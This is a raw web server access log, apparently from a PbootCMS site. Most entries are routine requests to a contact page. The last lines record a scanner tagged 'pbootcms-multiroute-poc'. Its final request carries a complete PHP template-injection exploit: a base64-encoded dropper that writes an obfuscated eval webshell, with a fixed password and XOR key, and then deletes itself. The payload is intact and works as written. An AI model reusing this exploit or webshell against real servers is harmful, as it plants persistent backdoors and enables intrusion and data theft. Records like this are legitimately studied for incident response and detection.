82.98.104.32 - - [23/Aug/2026:12:07:52 +0800] "GET /?Action-19/3451.html HTTP/1.1" 200 10042 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/122.0"
148.251.222.209 - - [23/Aug/2026:12:08:00 +0800] "GET /?contact/ HTTP/1.1" 301 166 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3; rv:115.0) Gecko/20100101 Firefox/115.0"
45.132.194.19 - - [23/Aug/2026:12:09:08 +0800] "GET /?contact/ HTTP/1.1" 301 166 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3"
45.132.194.19 - - [23/Aug/2026:12:09:09 +0800] "GET /?contact/ HTTP/1.1" 200 7911 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3"
23.88.77.150 - - [23/Aug/2026:12:09:09 +0800] "HEAD /?contact/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/122.0"
23.88.77.150 - - [23/Aug/2026:12:09:11 +0800] "HEAD /?contact/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/122.0"
148.251.222.199 - - [23/Aug/2026:12:09:11 +0800] "GET /?contact/ HTTP/1.1" 301 166 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
179.43.189.93 - - [23/Aug/2026:12:10:13 +0800] "GET /?contact/ HTTP/1.1" 301 166 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121."
179.43.189.93 - - [23/Aug/2026:12:10:14 +0800] "GET /?contact/ HTTP/1.1" 200 7911 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121."
23.88.77.150 - - [23/Aug/2026:12:10:15 +0800] "HEAD /?contact/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/122.0"
23.88.77.150 - - [23/Aug/2026:12:10:16 +0800] "HEAD /?contact/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/122.0"
103.108.67.114 - - [23/Aug/2026:12:12:35 +0800] "GET / HTTP/1.1" 301 166 "-" "pbootcms-multiroute-poc"
120.71.59.90 - - [23/Aug/2026:12:12:41 +0800] "GET / HTTP/1.1" 200 28033 "-" "pbootcms-multiroute-poc"
124.225.182.34 - - [23/Aug/2026:12:12:49 +0800] "GET /?p=/aboutus/&s=<?if(!file_exists('ed233361/tempp3.php')){@mkdir('cache');@file_put_contents('cache/tempp3.php',base64_decode('PD9waHAKZnVuY3Rpb24gX2goKSB7CiAgICAkYSA9ICdhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ekFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaMDEyMzQ1Njc4OSc7CiAgICAkciA9ICcnOwogICAgJG4gPSBzdHJsZW4oJGEpOwogICAgZm9yICgkaSA9IDA7ICRpIDwgMTI7ICRpKyspIHsKICAgICAgICAkciAuPSAkYVtmdW5jdGlvbl9leGlzdHMoJ3JhbmRvbV9pbnQnKSA/IHJhbmRvbV9pbnQoMCwgJG4gLSAxKSA6IG10X3JhbmQoMCwgJG4gLSAxKV07CiAgICB9CiAgICByZXR1cm4gc3Vic3RyKG1kNSgkciksIDAsIDEwKTsKfQokaCA9IF9oKCk7CkBmaWxlX3B1dF9jb250ZW50cygkaCAuICcucGhwJywgJzw/cGhwIEBzZXNzaW9uX3N0YXJ0KCk7QHNldF90aW1lX2xpbWl0KDApO0BlcnJvcl9yZXBvcnRpbmcoMCk7ZnVuY3Rpb24gZW5jb2RlKCRELCRLKXtmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHskYyA9ICRLWyRpKzEmMTVdOyREWyRpXSA9ICREWyRpXV4kYzt9cmV0dXJuICREO30kcGFzcz0icGFzcyI7JHBheWxvYWROYW1lPSJwYXlsb2FkIjska2V5PSIzYzZlMGI4YTljMTUyMjRhIjtpZiAoaXNzZXQoJF9QT1NUWyRwYXNzXSkpeyRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpO2lmIChpc3NldCgkX1NFU1NJT05bJHBheWxvYWROYW1lXSkpeyRwYXlsb2FkPWVuY29kZSgkX1NFU1NJT05bJHBheWxvYWROYW1lXSwka2V5KTtpZiAoc3RycG9zKCRwYXlsb2FkLCJnZXRCYXNpY3NJbmZvIik9PT1mYWxzZSl7JHBheWxvYWQ9ZW5jb2RlKCRwYXlsb2FkLCRrZXkpO31ldmFsKCRwYXlsb2FkKTtlY2hvIHN1YnN0cihtZDUoJHBhc3MuJGtleSksMCwxNik7ZWNobyBiYXNlNjRfZW5jb2RlKGVuY29kZShAcnVuKCRkYXRhKSwka2V5KSk7ZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDE2KTt9ZWxzZXtpZiAoc3RycG9zKCRkYXRhLCJnZXRCYXNpY3NJbmZvIikhPT1mYWxzZSl7JF9TRVNTSU9OWyRwYXlsb2FkTmFtZV09ZW5jb2RlKCRkYXRhLCRrZXkpO319fT8+Jyk7CmhlYWRlcignQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluJyk7CmVjaG8gJ3d1dGknIC4gJGg7CkB1bmxpbmsoX19GSUxFX18pOwo/Pg=='));@rename('cache','ed233361');}?> HTTP/1.1" 302 5 "-" "pbootcms-multiroute-poc"
